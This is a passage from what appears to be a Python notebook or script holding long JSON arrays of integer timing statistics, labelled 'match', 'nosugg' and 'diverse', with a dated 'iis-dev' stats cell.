6,123,13,12,146,110,169,152,43,41,80,137,323,119,119,44,333,157,156,111,244,135,44,58,167,187,211,207,343,120,155,116,424,141,624,102,225,136,262,130,339,128,151,227,115,132,109,202,308,171,103,204,98,169,65,116,24,23,114,112,213,4,67,164,102,204,107,215,97,195,171,130,102,278,172,113,276,47,59,107,195,43,135,114,202,188,6,4,26,24,137,92,144,146,115,217,167,94,189,129,174,128,248,31,131,6,184,181,272,121,100,196,199,126,228,207,255,348,190,330,116,148,289,180,307,63,159,183,277,220,178,320,108,317,99,194,113,213,100,196,105,101,24,122,108,176,269,63,96,212,323,112,194,26,143,40,85,100,26,122,80,104,288,67,98,40,81,109,204,104,175,188,122,30,60,107,196,99,204,199,174,176,198,302,43,58,150,97,201,204,85,157,168,398,193,144,56,86,142,98,230,103,313,116,213,171,205,334,112,207,100,194,23,47,133,157,142,95,199,117,150,113,220,115,208,27,151,119,202,111,95,214,39,120,86,166,100,204,289,73,171,136,286,109,176,98,101,183,102,141,141,254,111,229,96,194,136,286,65,145,100,219,117,308,417,144,102,138,97,197,49,208,318,39,127,104,126,112,222,21,48,108,247,100,219,82,186,97,126,201,33,69,117,7,6,75,93,9,92,212,110,211,76,7,118,6,33,28,57,104,202,22,119,101,203,39,143,235,121,274,107,137,101,206,123,203,417,98,203,209,268,443,314,116,193,150,107,210,39,138,108,103,231,132,154,91,97,222,110,211,91,192,6,29,29,254,260,7,94,29,125,88,205,215,123,223,90,183,123,220,86,217,116,107,211,111,244,328,115,241,127,230,189,96,197,118,321,182,145,406,53,155,222,97,190,91,282,144,337,188,106,210,49,89,46,137,87,181,50,151,168,186,508,425,130,200,63,113,107,211,168,179,284,175,186,117,227,368,328,137,254,98,205,104,304,5,5,131,239,6,23,166,75,102,101,278,363,73,178,122,218,108,233,90,105,142,7,21,96,193,53,110,218,113,193,29,121,248,125,100,222,116,215,120,293,191,301,119,232,122,156,30,176,282,245,20,6,33,121,250,131,220,327,149,273,396,276,204,104,238,112,233,53,151,226,121,189,102,214,34,75,121,228,148,261,44,79,100,182,221,14,103,221,99,202,130,107,202,157,53,151,92,124,201,210,106,195,109,164,106,155,101,223,110,203,232,23,62,103,213,111,206,68,82,27,45,187,109,217,102,120,134,265,147,106,200,105,333,96,270,103,259,221,420,104,228,115,219,6,6,28,27,109,12,121,135,205,59,158,191,25,25,117,149,26,126,195,135,391,118,230,133,267,37,133,102,320,149,230,210,245,356,434,117,126,128,72,105,94,197,148,107,239,145,315,143,29,125,108,95,120,105,198,121,234,111,149,150,100,203,6,85,26,122,101,209,94,202,69,85,27,96,26,137,115,226,119,98,183,113,219,110,223,38,179,43,82,101,26,48,121,102,207,131,223,7,110,140,214,105,189,127,229,129,47,45,6,5,103,156,7,111,158,186,349,301,137,277,196,107,217,8,104,36,13,12,100,136,153,166,99,148,58,94,40,105,106,211,103,223,204,113,228,110,218,120,111,108,133,104,216,115,327,156,140,328,51,85,84,132,23,185,42,77,99,168,99,230,108,210,210,370,103,212,141,113,109,102,207,139,182,118,246,118,258,165,631,103,102,99,220,125,247,110,224,100,197,131,237,155,119,100,211,122,219,192,224,312,99,190,105,222,47,169,165,100,157,188,309,103,226,100,198,194,292,48,69,104,204,238,41,131,112,212,34,50,45,74,132,39,39,33,52,99,247,125,90,176,103,204,135,238,128,225,120,222,128,220,31,46,27,55,23,43,94,200,113,219,120,223,109,312,97,207,131,104,134,90,138,224,106,106,99,201,23,103,137,174,32,133,62,181,276,123,242,103,208,101,220,125,267,99,114,219,106,133,28,116,33,56,101,216,98,211,70,179,107,102,108,108,154,7,8,19,105,34,135,97,194,101,170,51,107,119,121,235,124,237,114,212,103,228,121,164,235,438,107,209,104,197,40,68,36,62,195,28,64,27,45,127,258,119,239,101,209,77,111,139,108,232,162,5,28,113,224,102,208,
210,229,349,92,198,139,239,100,206,140,233,99,215,128,242,120,118,119,192,186,229,66,45,64,110,225,154,108,105,220,108,213,93,191,101,205,95,274,182,118,120,101,201,112,222,125,121,143,102,118,100,207,96,89,229,96,216,122,230,98,210,123,235,107,216,125,234,129,225,26,24,99,199,132,231,102,216,86,216,99,134,27,23,115,155,107,239,170,33,59,127,241,159,40,40,110,207,23,111,139,228,114,218,105,207,114,24,115,113,222,117,231,165,111,216,98,196,234,205,345,116,354,104,227,109,213,25,228,145,114,231,113,290,216,148,23,43,120,231,25,41,131,223,126,126,115,228,72,121,153,22,39,51,68,96,208,101,211,113,254,116,218,138,226,114,230,201,171,55,149,157,109,109,32,135,125,26,212,231,130,231,95,270,106,218,112,121,99,200,108,107,146,233,246,315,159,7,25,141,262,104,18,310,340,105,291,216,100,153,124,240,118,207,105,205,112,167,153,42,80,128,263,161,60,146,142,122,28,34,59,95,233,131,104,211,93,116,90,15,194,48,150,6,122,304,207,134,222,125,246,18,6,5,32,52,109,213,154,127,112,223,114,233,4,122,232,162,69,109,225,63,168,102,187,21,113,109,318,99,242,106,227,125,148,97,200,117,295,196,102,242,137,121,183,38,128,92,197,109,295,166,114,248,104,207,134,234,102,344,125,186,138,28,143,78,123,112,214,97,201,179,317,280,331,133,234,69,104,115,322,169,128,65,265,107,228,35,161,225,65,170,97,157,221,108,223,115,217,104,230,179,126,353,192,122,80,127,141,310,107,49,151,183,209,125,213,46,175,296,115,221,98,196,101,206,112,311,134,143,270,84,25,136,113,174,93,130,327,182,26,110,216,81,180,124,229,138,182,188,296,119,172,131,245,134,231,58,107,214,108,191,127,267,109,238,132,354,350,351,490,6,97,7,37,107,230,54,136,140,241,135,121,238,247,119,126,96,307,174,226,177,101,207,131,42,44,103,140,98,208,121,229,66,122,105,127,124,245,18,17,96,183,67,203,158,118,225,7,6,196,187,302,113,236,96,210,102,203,84,170,6,26,99,210,108,239,108,108,138,142,269,159,111,220,96,225,105,187,78,76,7,6,108,216,67,203,312,336,80,111,84,142,72,93,95,204,36,155,122,38,137,47,93,96,124,104,319,194,54,78,116,220,31,116,210,27,108,108,199,110,234,175,212,331,117,228,105,209,102,209,52,77,99,245,113,312,178,111,225,26,150,107,190,102,211,65,124,112,239,109,146,194,161,42,86,46,157,108,224,41,99,208,104,225,341,52,60,22,116,159,247,104,166,181,176,122,406,196,116,217,109,224,224,351,134,235,24,46,97,207,270,152,142,263,127,181,310,136,243,116,213,114,200,106,255,219,188,299,121,291,238,165,286,173,126,276,386,155,304,8,176,172,173,181,200,142,222,211,154,285,106,254,380,122,167,156,270,5,27,138],"match":[232,187,289,95,196,151,409,236,186,228,315,485,326,157,98,222,92,208,95,284,114,111,6,4,132,259,100,213,216,104,196,108,131,99,282,132,311,183,102,240,24,58,118,310,226,217,419,241,176,296,107,203,96,196,130,230,110,223,306,99,202,121,178,99,213,100,168,280,104,208,99,191,201,204,295,123,222,126,232,129,243,143,154,345,118,250,142,281,502,195,129,246,304,241,302,344,508,129,238,114,247,41,144,134,245,115,112,220,116,218,111,140,237,101,217,218,172,316,99,213,116,225,129,304,161,331,228,45,146,41,151,63,127,45,156,112,335,154,41,101,207,135,257,307,297,436,53,56,39,147,108,253,37,53,115,265,227,126,333,165,120,262,84,137,378,113,227,88,173,109,241,35,141,60,72,217,198,329,18,129,167,87,214,127,398,241,278,20,37,228,128,226,100,240,124,301,424,125,460,288,112,100,285,209,99,186,107,189,126,266,104,196,177,107,214,343,107,244,233,248,284,125,262,177,215,285,116,477,132,588,447,151,276,99,249,137,246,162,269,118,159,171,51,166,100,209,116,243,137,73,198,240,436,115,313,187,192,173,316,124,204,158,292,145,186,142,351,184,124,226,29,65,120,260,374,259,115,
219,135,216,96,116,187,303,29,23,131,120,289,90,91,113,247,152,168,290,322,143,306,36,701,666,178,488,145,288,171,335,211,143,326,114,238,267,153,316,144,257,128,246,199,16,13,93,143,143,133,271,128,328,224,220,247,368,298,166,416,193,540,27,59,36,217,450,113,198,35,48,196,74,213,261,298,448,156,183,25,346,270,219,82,192,34,127,100,704,138,346,193,159,153,320,159,265,121,240,189,190,330,110,125,246,215,206,446,215,182,115,219,96,268,164,341,176,127,359,242,109,97,141,112,109,218,104,180,96,124,43,135,76,168,89,180,106,189,30,63,171,194,289,150,212,305,268,106,198,102,200,104,201,27,110,209,73,162,114,147,119,217,108,203,107,269,152,114,186,100,154,98,217,47,54,33,152,139,144,113,251,33,137,125,217,170,290,112,235,287,109,130,92,157,22,48,96,188,29,53,31,125,192,319,100,269,209,204,112,105,197,97,189,100,217,113,261,111,204,156,128,329,176,100,263,142,174,99,192,94,195,131,209,282,108,277,99,198,97,195,116,226,196,183,115,209,6,110,72,64,65,93,151,104,191,98,289,58,54,140,124,222,22,56,27,198,144,61,112,263,25,115,96,194,108,201,165,136,269,106,204,106,206,87,174,40,201,163,96,182,107,223,109,104,204,109,204,57,229,199,251,196,163,101,195,111,80,210,255,303,298,434,27,25,207,307,74,122,232,98,223,28,53,99,195,110,127,204,111,269,155,38,143,202,190,95,191,102,200,145,45,196,177,110,96,183,170,130,282,98,115,114,206,113,205,191,36,144,120,149,245,176,183,275,156,170,272,110,157,137,123,217,95,188,162,100,191,44,130,113,209,157,104,217,68,111,98,194,84,206,92,120,93,209,25,109,32,50,136,59,314,181,195,220,112,204,100,194,66,134,129,220,105,201,182,170,317,90,110,202,45,64,113,207,79,118,55,160,160,211,112,212,138,108,148,281,103,141,100,292,148,99,267,142,149,95,292,153,169,137,290,103,125,8,39,190,169,265,115,207,110,187,46,77,96,188,182,134,291,217,99,198,190,94,155,106,210,313,52,111,63,169,104,126,101,200,126,316,234,33,36,150,108,131,97,212,146,126,215,102,210,44,125,124,266,177,28,91,154,104,205,104,112,99,265,108,109,208,132,232,122,159,29,68,25,39,91,188,163,110,266,157,178,176,372,134,6,40,115,222,63,162,101,215,260,281,157,103,217,32,120,221,223,321,97,196,99,204,124,228,119,230,54,96,162,165,183,107,195,291,101,155,267,126,218,110,226,120,114,305,164,123,203,305,110,233,208,158,332,114,188,24,123,138,126,219,128,53,132,104,206,106,306,219,108,303,100,210,126,102,247,126,107,119,119,226,197,113,213,107,207,105,29,47,90,210,203,193,173,293,7,105,126,275,103,202,115,225,8,105,179,307,448,282,154,146,273,105,218,70,180,88,123,220,100,207,123,143,111,215,195,152,215,24,129,26,43,107,130,97,31,65,102,217,329,120,235,108,152,40,58,6,85,126,245,94,112,120,113,226,52,107,221,98,200,35,134,127,108,211,118,212,115,214,286,453,102,226,133,103,197,109,126,86,235,147,104,210,112,296,248,231,222,103,203,217,166,324,136,113,213,102,198,92,202,252,106,204,123,92,150,46,142,254,111,210,215,322,9,56,109,204,94,193,100,196,142,5,56,26,148,43,63,27,45,105,205,110,101,200,42,60,108,374,356,359,312,118,220,111,308,103,250,130,111,109,207,98,139,95,202,117,210,105,198,74,91,194,100,173,70,97,219,89,194,110,217,91,198,100,287,179,25,39,18,246,204,149,42,129,330,194,103,217,130,238,108,213,114,227,174,105,164,129,378,277,308,226,322,63,195,132,245,111,193,295,133,228,100,196,114,217,104,242,7,6,85,199,136,70,135,326,120,98,191,55,146,124,231,98,200,152,122,200,317,28,117,288,220,46,168,130,236,107,234,402,101,223,97,211,97,304,113,149,96,81,186,104,154,46,80,205,49,326,9,44,120,102,221,93,142,23,53,103,192,131,232,46,155,113,260,106,94,214,251,102,213,107,228,144,45,179,96,46,140,104,204,130,245,231,268,124,2
47,99,199,103,206,31,29,104,208,46,153,106,283,187,98,126,186,234,74,123,107,228,162,165,107,215,96,210,111,234,104,206,284,99,202,19,19,13,11,98,201,194,299,198,168,328,88,100,305,111,230,106,212,294,113,221,205,171,110,207,105,198,89,175,117,92,192,138,296,94,189,171,182,191,181,298,127,229,233,261,100,205,121,230,109,224,322,63,83,99,208,39,61,55,52,101,259,180,356,318,55,54,49,86,34,39,89,184,39,150,103,204,117,198,85,102,129,95,95,229,141,329,341,69,75,107,223,93,193,25,123,32,53,180,228,174,179,294,87,206,71,156,216,47,91,195,96,204,107,201,118,216,50,114,240,268,361,275,530,92,88,120,6,38,19,125,27,54,196,146,260,99,196,142,243,155,305,98,227,118,222,116,207,167,223,198,101,203,68,80,34,115,219,105,241,99,157,93,200,211,124,63,46,96,295,185,280,119,237,134,226,114,214,95,270,141,104,216,106,221,179,157,218,95,191,36,149,96,191,104,166,64,218,233,124,215,28,122,111,202,117,213,83,170,77,167,118,208,121,115,123,219,190,230,305,214,163,198,217,78,116,25,86,149,56,176,110,220,73,168,95,206,209,186,261,93,218,103,198,102,202,100,135,109,208,117,125,201,174,94,194,134,230,100,27,66,176,100,142,122,256,176,167,331,155,465,237,238,374,114,285,129,287,145,275,125,189,118,256,94,117,310,44,137,254,100,193,58,160,33,46,110,108,120,12,228,115,205,159,122,301,208,63,83,6,28,96,190,235,178,104,211,96,204,21,37,115,215,27,51,91,125,314,160,95,225,98,133,109,223,187,36,132,171,183,303,103,217,137,196,105,298,56,144,105,198,105,259,178,113,273,109,208,53,61,41,72,166,209,27,117,180,84,136,42,75,6,5,124,228,33,86,6,46,139,96,126,185,262,220,22,20,108,5,6,5,7,7,140,197,311,75,114,238,102,245,41,64,76,124,225,25,132,139,249,273,172,86,118,129,250,73,99,196,96,189,123,225,212,299,99,119,72,299,118,258,23,111,105,210,119,212,180,132,238,98,193,118,190,99,199,104,207,110,22,20,24,22,80,121,95,124,23,58,47,171,134,14,12,37,142,159,70,71,165,8,7,144,267,129,232,5,4,131,316,97,199,4,21,21,103,102,44,175,106,108,198,151,317,110,175,104,139,5,4,4,5,105,121,214,121,232,243,98,210,120,90,172,57,126,103,204,95,195,142,162,258,100,217,99,209,103,104,200,97,201,36,55,95,202,39,134,97,210,117,92,297,132,238,147,147,21,35,133,119,244,108,186,279,103,229,152,137,276,108,203,96,147,22,39,90,257,110,217,43,52,102,137,261,134,242,113,242,110,145,151,133,257,73,220,295,150,290,141,208,132,252,124,218,407,374,99,280,208,31,147,124,277,117,121,217,164,113,217,106,164,26,190,84,103,96,207,111,219,104,207,124,230,69,107,294,135,94,119,44,138,40,47,131,123,234,142,216,88,193,111,234,99,196,75,86,67,118,116,248,127,71,168,86,184,54,145,110,167,111,218,34,63,152,106,204,113,147,100,198,119,222,150,257,183,222,99,210,122,226,192,221,236,42,121,130,294,245,224,238,364,96,179,99,190,96,199,94,183,559,544,771,100,201,130,235,6,5,99,193,7,7,109,124,7,6,127,22,114,214,107,197,136,81,211,93,185,97,205,67,87,114,77,118,41,141,30,51,162,291,42,70,96,197,46,143,203,161,110,110,89,182,103,203,247,32,176,142,154,158,388,150,96,229,107,208,102,171,138,236,109,213,75,171,116,203,113,107,29,125,92,202,113,138,126,104,208,117,8,7,30,46,23,132,105,123,186,7,6,128,6,5,7,7,98,191,6,5,111,207,130,239,44,140,126,180,120,229,31,55,114,300,63,149,92,112,117,265,65,35,129,106,232,102,101,120,216,123,386,176,98,205,112,209,97,198,104,155,115,40,124,187,295,111,223,110,233,104,300,146,115,223,42,58,93,194,24,108,239,7,7,103,210,112,203,7,7,80,189,5,122,103,156,107,205,127,234,116,225,219,347,127,185,46,107,211,170,327,116,232,68,44,136,124,218,126,145,252,109,223,120,237,113,218,101,199,122,223,54,87,119,5,41,67,90,92,178,283,118,230,108,183,104,200,118,1
80,57,78,42,129,113,210,88,194,157,101,210,82,59,161,155,255,146,110,140,29,128,113,217,116,248,150,107,209,103,221,125,218,29,53,37,61,120,248,104,206,79,186,118,138,259,184,207,39,72,101,222,112,235,113,270,161,109,218,270,112,170,130,97,219,98,235,100,209,184,109,27,233,29,135,112,103,197,99,203,64,169,52,110,208,86,188,201,65,129,56,195,115,232,242,95,197,130,6,108,213,185,161,92,200,184,323,129,222,217,88,191,149,172,73,172,131,99,205,104,199,363,97,220,39,74,39,43,102,204,26,125,118,263,232,370,40,37,5,4,4,4,5,4,4,3,3,3,3,110,237,172,313,95,178,126,129,104,205,266,262,44,53,39,38,25,57,95,202,98,158,58,132,251,127,114,204,38,61,103,225,99,301,102,221,154,133,226,164,99,208,112,146,127,77,119,82,229,120,295,240,399,249,357,55,125,338,126,474,32,163]} ''' #%% # iis-dev 2017-06-14 stats = ''' {"numInflight":0,"nosugg":[223,72,172,49,54,365,500,39,49,37,224,65,70,48,71,53,212,92,144,63,59,46,211,39,59,53,54,263,63,64,57,59,154,190,34,33,75,158,111,74,71,105,68,68,69,73,171,104,100,48,115,113,72,50,52,45,47,52,52,49,45,92,99,98,115,208,92,40,35,87,81,45,62,166,78,42,52,90,50,76,61,93,97,132,58,75,175,45,55,151,42,57,32,58,115,146,143,67,64,47,53,80,76,99,150,104,100,136,41,74,191,117,103,133,52,74,224,52,60,49,86,57,62,60,87,117,150,150,184,66,71,52,48,126,83,80,123,56,77,46,87,77,74,64,61,5,67,66,5,29,47,74,142,6,5,115,35,270,270,177,53,64,60,63,124,62,58,234,164,78,45,76,52,57,21,59,216,73,109,76,113,43,50,46,80,119,55,80,206,44,42,6,5,63,89,80,108,10,48,57,68,137,131,146,170,77,126,122,155,69,65,181,221,225,266,72,60,59,53,60,93,115,118,81,97,86,42,52,166,334,64,66,56,78,77,108,141,60,61,57,88,182,12,44,7,14,44,12,45,22,5,64,109,5,46,73,74,78,74,72,75,6,41,68,64,210,51,51,115,127,41,68,214,77,72,56,48,322,66,71,59,55,49,48,49,53,81,58,54,145,48,121,123,71,69,143,54,85,92,66,62,40,214,50,92,312,198,52,68,64,56,62,225,97,47,50,61,60,62,58,42,45,79,49,85,64,67,162,158,74,81,56,75,174,67,71,51,47,54,60,87,78,55,51,62,77,42,66,91,158,214,206,41,62,88,46,58,81,76,61,61,63,60,214,62,59,40,46,68,81,44,155,63,52,66,43,88,67,63,47,66,114,56,69,184,181,79,76,46,71,68,93,49,50,63,81,52,50,87,88,69,69,56,58,159,54,49,49,71,67,47,63,60,89,83,60,74,121,126,67,85,67,81,78,74,65,81,51,107,80,52,125,150,129,72,291,330,59,83,73,480,545,338,67,63,49,51,88,73,193,47,51,184,41,359,219,6,5,75,70,25,42,65,6,5,231,128,96,91,45,51,45,59,5,39,40,59,61,58,62,59,59,132,117,32,36,64,168,37,79,46,56,56,58,42,44,48,38,41,59,53,81,208,153,93,89,64,60,43,43,113,132,92,11,38,185,37,34,39,66,37,41,36,35,62,64,84,89,122,62,64,44,91,68,66,119,49,49,8,47,55,66,48,88,149,142,47,95,57,63,61,62,47,54,39,79,51,64,89,100,57,55,54,66,58,56,64,36,43,46,53,40,46,51,47,36,61,42,101,82,51,54,36,54,80,74,70,48,93,86,39,36,62,60,13,53,158,5,48,43,71,67,63,259,57,53,89,90,61,106,67,43,80,57,59,70,75,52,62,59,65,370,366,70,68,152,72,68,55,53,50,62,69,53,70,46,44,104,40,94,63,64,114,109,53,66,65,63,107,102,50,46,58,55,182,99,8,79,75,266,264,61,99,90,64,53,55,49,71,142,207,68,63,60,62,48,83,71,191,80,67,67,177,93,42,80,95,92,185,40,52,44,75,41,90,86,144,53,43,75,61,57,78,76,95,10,41,172,177,175,52,50,64,59,60,62,66,62,104,138,134,43,53,66,71,46,57,59,77,46,55,74,81,44,221,60,60,57,145,136,70,76,63,55,58,67,63,76,73,262,82,79,61,106,132,47,54,44,89,84,65,101,74,119,190,63,96,64,72,75,77,74,75,57,55,117,112,97,173,68,65,81,77,183,61,74,80,54,57,78,52,55,53,70,74,54,54,74,115,49,46,66,85,72,72,61,81,80,76,50,46,43,75,55,52,91,118,126,166,46,70,44,40,264,169,61,60,52,63,320,315,46,61,55,63,41,38,62,109,58,104,172,53,69,94,140,152,89,171,44,42,1
77,223,437,75,71,44,40,49,94,47,45,53,89,76,107,62,107,99,148,145,123,49,57,49,47,41,57,56,59,74,114,41,81,146,185,62,62,76,79,363,627,623,52,82,54,94,90,101,66,101,118,71,61,162,312,51,84,50,85,245,240,53,51,76,72,73,233,229,129,57,56,72,116,71,66,65,42,80,314,180,111,93,89,261,84,83,41,83,116,58,55,80,125,32,68,62,59,120,56,101,97,63,83,92,94,63,63,60,56,180,52,54,64,63,53,89,79,49,77,117,90,96,72,69,51,51,61,59,62,67,85,82,47,50,86,82,200,185,88,93,52,94,78,81,81,56,51,81,80,84,129,124,95,70,53,92,91,87,55,52,199,67,64,44,86,55,56,50,59,130,164,56,53,47,87,146,121,116,88,129,82,127,68,112,57,52,60,106,52,49,37,121,133,68,108,74,72,122,269,149,183,73,117,56,56,18,52,75,71,269,67,104,58,55,75,106,69,113,65,60,172,71,75,104,48,86,62,74,70,47,92,52,54,128,120,58,87,65,61,85,128,52,49,140,50,86,148,141,62,58,57,54,51,61,6,6,6,42,123,61,106,150,153,55,59,42,41,42,40,50,58,59,55,59,85,43,83,42,32,48,73,238,261,47,59,71,56,62,55,61,57,73,80,70,87,94,68,65,56,60,54,57,85,151,147,52,75,5,5,11,151,78,93,53,65,41,49,43,69,47,72,53,107,56,54,148,151,64,93,54,54,48,69,77,117,50,47,63,64,143,44,62,52,85,50,71,56,55,42,76,52,89,69,66,57,57,43,39,265,46,43,43,99,51,78,120,61,60,54,52,56,59,55,69,103,87,47,50,53,67,50,101,62,81,111,54,54,52,51,45,58,153,184,174,49,51,43,53,55,56,53,68,56,65,48,46,40,48,102,170,57,65,58,59,47,70,56,6,48,242,185,130,183,180,56,47,48,56,54,39,47,104,58,54,141,63,70,49,54,51,55,57,153,150,55,64,76,57,54,77,74,52,84,81,40,39,56,55,38,57,56,75,73,41,51,94,44,82,53,41,39,80,71,81,104,56,54,63,71,71,68,70,66,40,62,54,64,62,64,69,43,62,51,56,65,62,50,58,50,47,74,106,57,62,64,61,87,52,84,51,76,74,138,224,141,161,158,63,62,59,63,45,51,48,79,77,33,43,48,51,268,265,76,73,59,56,51,66,48,62,51,50,90,110,72,68,57,49,62,63,241,262,120,156,63,397,183,62,60,50,79,22,48,52,147,69,74,15,207,166,162,112,110,17,57,64,68,65,75,72,47,43,64,213,91,88,57,60,57,96,53,51,292,288,297,135,175,54,99,58,55,50,58,48,82,190,239,69,65,95,75,120,109,106,56,53,240,314,70,92,81,62,60,140,82,45,94,70,101,236,231,22,66,61,53,66,54,55,52,52,39,37,51,71,72,246,242,55,58,40,44,41,197,214,54,127,145,78,80,80,120,166,206,123,269,270,60,66,135,99,110,44,55,58,53,87,99,45,57,65,86,104,47,91,172,174,56,185,186,80,93,168,82,89,109,65,79,109,63,83,179,401,53,61,52,76,86,108,87,85,149,45,71,44,84,156,157,57,185,189,242,48,49,143,191,218,71,79,106,48,50,50,24,56,17,7,47,11,124,89,317,90,128,126,128,121,122,200,244,221,265,95,110,215,354,157,69,78,165,193,120,99,144,130,131,183,99,134,81,142,89,162,282,61,191,120,155,167,70,77,136,113,164,86,100,165,211,70,190,197,258,205,76,87,160,89,99,118,106,107,232,55,99,110,145,124,121,140,194,67,76,80,109,359,78,115,111,124,134,177,192,139,190,148,196,131,237,105,43,76,85,88,89,140,165,89,102,263,44,181,184,187,54,151,161,163,70,73,71,106,111,37,59,63,85,48,132,138,176,77,92,56,106,151,79,82,106,64,75,77,65,69,72,113,124,189,176,56,66,155,149,220,110,141,74,78,104,116,67,76,76,70,71,85,63,64,167,61,61,83,81,80,88,335,52,254,256,257,261,144,145,147,84,74,173,216,220,203,204,95,111,221,53,91,95,120,21,14,198,214,27,63,75,51,71,73,47,75,92,218,220,219,37,51,67,98,98,67,72,71,251,306,44,115,147,23,113,45,64,71,83,167,180,94,63,63,57,59,68,85,149,154,69,69,71,194,8,57,74,77,163,175,75,92,156,63,89,163,80,148,149,116,118,127,129,119,120,79,114,116,118,46,61,66,80,97,117,52,89,79,157,114,138,142,110,112,126,121,127,127,88,154,215,121,171,248,76,79,187,191,93,124,48,68,91,200,202,205,113,130,10,33,130,166,177,99,107,125,61,90,128,68,68,69,77,54,61,72,77,46,62,60,62,50,76,72,84,138,14,110,136,
23,87,270,79,68,110,60,183,66,72,78,52,67,136,73,127,173,180,159,137,235,178,242,103,144,68,90,78,77,137,147,44,53,60,55,67,99,147,153,55,58,84,118,183,68,69,86,136,253,276,196,64,80,41,121,139,169,177,191,100,135,104,108,95,55,177,185,78,96,111,120,60,59,69,84,177,178,75,47,175,49,199,257,86,60,48,75,106,113,86,120,69,81,113,114,152,54,147,149,147,165,48,75,129,75,132,59,148,151,160,188,97,109,51,126,160,134,250,72,52,135,198,53,66,52,59,120,266,68,64,88,94,97,52,67,59,79,73,233,236,105,300,302,103,104,51,86,137,158,120,125,68,121,107,173,55,198,223,110,104,106,151,175,155,160,70,86,46,58,117,226,229,224,60,107,72,169,57,75,149,157,148,182,260,216,73,168,114,155,88,110,123,81,81,108,49,364,122,178,70,72,72,125,53,137,77,79,38,98,191,8,54,114,239,7,79,153,17,160,283,44,27,142,237,22,141,151,68,82,47,163,8,9,52,137,332,48,60,145,166,165,143,107,114,47,89,86,71,92,130,90,101,79,81,48,40,65,106,65,68,105,113,116,119,93,69,74,88,57,125,137,86,84,114,44,107,129,65,65,84,59,134,47,64,71,77,134,159,161,53,65,62,63,132,142,152,174,41,183,41,100,50,88,94,84,89,94,97,83,76,91,140,60,62,99,74,74,83,68,48,61,122,51,58,62,92,58,59,68,70,71,49,104,125,132,287,42,67,125,133,139,122,42,55,52,98,132,65,58,78,81,115,121,122,177,114,120,122,96,104,106,62,48,74,141,63,150,95,130,69,71,117,198,200,114,124,45,97,44,172,172,56,119,122,103,68,75,94,128,142,57,60,54,36,124,12,50,40,61,85,134,137,91,89,128,123,141,145,94,108,220,45,58,90,146,52,100,126,73,134,77,46,236,72,119,296,53,107,44,14,47,77,36,142,11,12,18,71,87,89,90,66,61,35,57,126,65,76,53,63,161,256,58,63,67,94,52,51,177,73,77,83,92,106,188,170,178,120,130,156,184,86,132,76,141,190,65,67,60,129,62,131,70,77,65,74,93,121,125,135,144,68,69,88,89,100,146,92,109,132,147,88,91,76,90,93,62,59,51,83,82,75,84,96,187,70,81,43,69,65,87,68,114,125,54,66,74,90,127,157,158,83,87,115,133,160,227,102,146,113,130,69,74,77,146,22,68,133,48,162,177,176,92,122,131,97,54,58,125,125,63,65,74,79,71,97,334,67,70,167,83,49,162,177,46,299,299,56,77,114,51,49,61,153,153,117,119,154,112,14,131,40,78,91,354,86,61,120,39,68,40,134,59,116,92,113,136,159,67,80,121,58,91,175,99,152,120,126,134,75,81,113,270,59,198,243,54,327,216,278,357,81,90,82,119,129,150,99,86,93,65,267,61,59,91,64,68,82,78,104,106,102,104,58,99,82,95,114,52,46,68,74,61,138,107,102,210,51,110,56,69,83,109,114,106,115,69,130,62,89,95,70,72,113,44,97,100,113,165,49,63,109,138,56,87,142,76,92,89,94,96,74,87,44,55,70,76,87,135,156,57,89,101,108,40,60,157,91,96,102,57,60,45,69,78,230,54,91,76,52,275,10,46,84,101,143,103,101,165,86,9,56,18,216,42,76,134,71,99,115,79,81,96,246,72,129,133,55,67,54,58,92,129,155,165,114,120,77,176,205,39,104,47,72,88,83,55,89,93,62,65,105,164,73,54,66,74,91,92,246,89,92,40,140,80,85,118,121,84,85,52,75,79,74,136,106,141,145,90,245,150,128,56,65,107,114,129,153,61,94,101,127,155,69,60,63,76,92,50,54,58,53,113,153,67,73,39,77,43,57,179,48,79,40,84,43,62,63,215,293,65,72,53,77,252,218,94,74,119,168,246,55,108,55,97,140,178,229,48,67,87,158,231,132,40,70,199,42,47,155,167,181,63,102,15,14,156,85,7,11,9,139,71,73,65,136,53,64,55,126,128,7,159,79,64,62,74,82,99,74,196,74,117,152,230,63,197,199,293,78,62,67,118,110,101,105,34,56,96,106,54,214,70,49,242,70,111,194,65,99,34,92,94,154,139,125,127,132,137,127,79,95,64,114,316,109,95,138,69,58,369,197,142,150,144,57,184,172,135,136,98,127,76,39,137,47,104,61,92,137,272,355,272,273,93,95,84,122,42,183,126,71,51,148,216,219,76,99,75,93,63,66,76,90,85,53,69,127,70,136,41,44,121,164,385,53,85,78,187,47,123,133,48,118,13,112,113,46,165,168,45,138,69,82,43,11
8,141,236,59,31,124,60,120,213,139,54,157,54,247,85,61,84,93,80,73,66,59,62,67,257,129,11,11,94,10,107,137,144,77,87,97,178,181,65,176,46,69,147,52,63,96,82,137,153,97,79,80,62,66,140,43,108,93,377,120,113,60,212,56,381,46,72,47,135,63,67,49,79,61,99,105,93,93,88,56,76,101,172,40,136,156,104,71,114,283,253,47,68,65,94,97,76,146,66,129,160,237,59,75,62,81,245,177,79,72,47,95,46,73,61,82,250,70,65,124,74,83,51,54,184,132,300,96,120,128,87,99,129,55,62,90,255,47,72,54,88,112,77,49,25,75,40,117,48,63,70,31,40,57,196,46,18,80,137,102,73,28,69,59,45,181,20,94,161,170,122,76,60,82,83,70,59,96,80,72,13,46,64,87,113,88,101,147,255,130,53,62,128,47,191,160,112,131,77,191,109,292,227,110,73,69,56,63,96,48,38,36,58,119,123,61,95,48,125,48,56,138,51,64,43,43,80,137,121,67,69,251,58,86,44,60,72,134,71,325,54,72,132,72,42,74,133,45,44,50,71,79,100,67,55,71,74,113,118,55,79,82,54,222,64,123,256,47,42,141,43,45,59,67,77,116,222,125,71,154,66,7,40,43,76,86,66,181,39,326,44,112,216,125,47,57,39,51,43,62],"diverse":[379,374,308,330,279,181,234,240,231,196,241,259,257,342,576,581,201,278,285,248,244,184,256,247,204,231,179,169,148,231,20,124,243,214,275,12,11,75,151,64,152,11,235,239,293,63,148,221,274,197,247,195,241,205,278,173,227,288,173,168,94,220,353,450,160,192,242,237,201,229,197,223,258,216,219,226,253,66,122,133,12,72,133,129,155,367,399,213,250,323,318,231,164,248,144,287,277,257,205,330,415,412,329,297,223,286,19,87,22,19,197,193,184,386,421,199,254,236,253,81,175,231,215,121,158,376,367,196,315,243,201,209,261,51,120,40,36,177,107,186,161,202,236,317,222,269,175,171,216,296,94,89,313,379,315,336,257,254,167,20,25,66,167,295,306,138,187,11,162,324,142,184,171,337,210,261,308,326,259,278,246,281,187,182,111,170,202,269,203,258,12,175,227,269,